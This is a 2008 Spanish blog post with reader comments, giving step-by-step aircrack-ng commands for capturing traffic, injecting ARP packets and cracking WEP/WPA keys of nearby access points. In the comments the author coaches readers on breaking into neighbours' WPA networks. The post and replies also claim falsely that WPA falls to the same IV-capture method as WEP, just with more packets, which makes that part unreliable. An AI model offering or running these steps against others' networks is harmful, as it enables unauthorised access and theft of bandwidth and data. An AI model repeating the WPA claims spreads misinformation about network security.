jueves, 10 de julio de 2008

------ HACKEO CLAVE WEP/WPA - SEGURIDAD DE REDES

En la actualidad los routers traen la opcion de elegir entre diferentes tipos de cifrado para dar seguridad a nuestras redes wireless, entre ellos WEP (Wired Equivalen Privacy ), WPA (Wi-Fi Protected Access) ademas de la posibilidad de utilizar la opcion de Filtrado MAC (del cual hablaremos en otra publicacion) para restringir el acceso a la red.Pero todo esto es vulnerable, y por lo tanto es necesario que conozcamos que tan seguros estan nuestros datos y nuestro ancho de banda.


Pero como hacer mas segura nuestra red si no sabemos como pueden entrar a ella .. ? , bueno el objetivo de este post es mostrarles como alguien puede decifrarla clave WEP o WPA y tener acceso.

En una ocasion en el curso de redes 1 me toco realizar una practica la cual consistia en decifrar las claves WEP/WPA de algunos Acces Point que estabanen los alrededores de la facultad y fue ahi donde me di cuenta de las vulnerabilidades de estos cifrados.


La informacion que se muestra es solo con fin de aprendizaje, acerca de como puede ser violada la seguridad de los sistemas de cifrado WEP Y WPA del estandar IEEE 802.11por lo tanto no me hago responsable de su uso indebido.


1ero.

Debemos contar con alguna distribucion de linux y tener instalado los siguientes paquetes: airoudmp, aireplay, y aircrack, o si no pueden buscar alguna de las distribuciones linux para audioria de redes ya sea wifislax o wifiway ( download.wifislax.com/ )


2do.

nuestra tarjeta debe aceptar el modo monitor (monitor mode), yo he probado con el chipset zydas en una hawking techonologies , e incluso con una broadcom ( que son las menos recomendadas) Intel pro wireless 3945 abg, ademas estan los chipsets atheros que son los preferidos para el caso.


3ro.

En este caso presentamos una situacion ideal en el que nuestra distribucion de linux reconoce nuestra tarjeta de red wireless


4to.

ya reconocida nuestra tarjeta, procedemos


5to.

abrimos una consola y escribimos lo siguiente


airodump-ng INTERFAZ_DE_NUESTRA_TAJETA (ej. eth0, eth1 ... esto lo podemos verificar en una consola escribiendo iwconfig)


ejemplo: airodump-ng eth1
entonces apareceran en consola todos los access point detectados, tendremos que fijarnos muy bien en el canal del AP (Access point ) para la prueba


6to.

abrimos otra consola y escribimos

airodump-ng -c CANAL_DEL_AP_DE_PRUEBA -w ARCHIVO_PARA_GUARDAR_LOS_PAQUETES_OBTENIDOS INTERFACE

ejemplo: airodump-ng -c 1 -w prueba_hackeo eth1


7mo.

abrimos otra consola para poder asociarnos al AP y escribimos


aireplay-ng -1 10 -a MAC_AP_DE_PRUEBA -h MAC_PC_QUE_INTENTA_HACKEAR -e ESSID_DEL_AP INTERFAZ
ejemplo: aireplay-ng -1 10 -a 02:30:0A:BC:0B:30 -h 00:0B:30:OA:5B:02 -e MIRED eth1

en este caso la PC que intenta hackear se asociaria cada 10 segundos al AP, con lo que aceleraria el proceso

8vo.

abrimos otra consola para empezar la inyeccion de trafico, ya que si no existe mucho trafico en la red se tardarian dias en comprobar la seguridad, por lo tanto se utiliza la inyeccion con el protocolo ARP para hacer el proceso mas rapido


aireplay-ng -3 -b MAC_AP_DE_PRUEBA -h MAC_PC_QUE_INTENTA_HACKEAR INTERFAZ

ejemplo: aireplay-ng -3 -b 02:30:0A:BC:0B:30 -h 00:0B:30:0A:5B:02 eth1


9no.

si funciono la inyeccion de trafico, observamos la segunda consola que abrimos y en la columna de paquetes asociada al AP de prueba controlamos que hayan sido recibidos aproximadamente 100,000 paquetes o mas para una clave WEP, mas de 180,000 para una clave WPA y presionamos ctrl+c para detener el proceso, yo recomiendo esa cantidad ya que esa me ha funcionado cuando he hecho mis pruebas, el proceso durara aproximadamente 1 hora.


10mo.

teniendo los paquetes necesarios abrimos otra consola y escribimos


aircrack-ptw ARCHIVO_PARA_GUARDAR_LOS_PAQUETES_OBTENIDOS

ejemplo: aircrack-ptw prueba_hackeo


y esperamos a que se ejecute el algoritmo del aircrack esto nos devolvera la clave WEP/WPA por ej. 11:7A:BC:0A:02, y esta clave ya se puede utilizar para tener acceso a la red.

En conclusion los cifrados WEP y WPA pueden son vulnerables, por lo que hasta el momento las tecnologias que conozco aqui en guatemala facilmente pueden ser violadas teniendo conocimiento de redes y teniendo las herramientas necesarias. Asi que controlen la seguridad de su red, ya que alguien puede andar merodiando por sus carpetas y aprovechando su ancho de banda .....

13 comentarios:

Rubén Coloma dijo...

Buen post!!!
Vamos a poner en practica Redes 1

Mundonet Internet Café dijo...

ta bueno.

Anónimo dijo...

Muy buen aporte a la comunidad de usuarios informáticos, hacen falta más blogs como este en donde se busque el beneficio de los usuarios y en los cuales el "blogger" comparta sus conocimientos sin escatimar en ellos. Pues bien, que bueno que publicaste esto, vamos a ponerlo a prueba. Y espero sigas con el blog y su proposito.

jason dijo...

jejeje el ALY pilas pues

yylex dijo...

buen post, aunque por ahora necesito una tarjeta inalámbrica...

btw, a veces se puede agradecer tener vecinos mulas :O

Billy Munoz dijo...

son casacas, jajaj ta bueno mano aunque no llegan señal por mi casa pero que pizados,jajajaj pero ya lo probe antes pilas para lo que no lo hay echo

Anónimo dijo...

no pasa nada.. :O solo explicaste lo de la clave WEP.. para una clave WPA q es la que estan comenzando a usar es mas dificil ( estan usando claves WPA xq ya sabes q las WEP son mas inseguras).. pero no tienen en cuenta q ... mientras mas seguridad la calidad de la linea disminuye.. culturizence un poco mas :o y les doy un par de datos si kieren seguir intentando con contraseñas WEP.. pueden usar el wifislax 3.1 :o y su tarjeta wifi debe tener de chipset atheros... y d preferencia star a menos de 2 cuadras de la antena proveedora asi obtendran la contraseña casi instantaneamente... saludos.. D5J

Aly Villela dijo...

Que bien que te hayas pasado por aca Anonimo D5J, pues el proceso es el mismo para una clave WEP o una WPA simplemente que para una WPA necesitas que capturar mas ivs, ya que el mismo proceso de inyección ARP te sirve para ambos.

No es necesario que tu tarjeta inalambrica tenga chipset atheros, podes utilizar cualquiera que sea soportada por el wifiway o wifislax ( ej. reltek, zydas, etc. ) y si no, puedes utilizar ndiswrapper el cual soporta la mayoria de tarjetas inalambricas en linux.

Tampoco es necesario que esten a dos cuadras de tu casa, si la persona cuenta con una antena direccional u omnidireccional que buena potencia de DBI´s puede tener acceso a tu red desde grandes distancias.

Con respecto a lo de calidad de la linea, supongo que te referis a la velocidad de transmición (ancho de banda) . No importa que tipo de encriptación tenga la clave del AP , si tenes una antena potente o estas cerca del AP tendrás el mismo ancho de banda.

Laura Cardoso dijo...

BUENAS,
ME GUSTARIA SABER COMO PUEDO SABER LA CLAVE DE UNA RED CON SEGURIDAD WPA

GRACIAS, TE RECOMIDENO UN MONTON YA QUE HE ESTADO MOLESTANDO BASTANTE CON ESO, Y TODAS LAS REDES QUE ESTAN CERCA A MI CASA TIENEN SEGURIDAD WPA

Aly Villela dijo...

Bienvenida Laura ...

Pues lo único diferente que tienes que hacer para desencriptar una clave WPA es capturar muchas muchas mas iv`s de las que capturas para una WEP.
Calculo que arriba de 500,000.

Por supuesto recorda siempre utilizar la inyeccion arp que te muestro en los pasos para hacerlo mas rapido.

Saludos ....

Anónimo dijo...

En el paso 7 no logro saber a que se refiere en el ejemplo con "MIRED", es un comando o un archivo?; esta instruccion no me funciona.

Aly Villela dijo...

MIRED es el nombre del AP que queremos hackear, por ej. TURBONETT ...

Anónimo dijo...

Hola amigo quisiera saber si el procedimiento que mencionas tambien funciona para WPA2?
o k es lo k se tiene k hacer...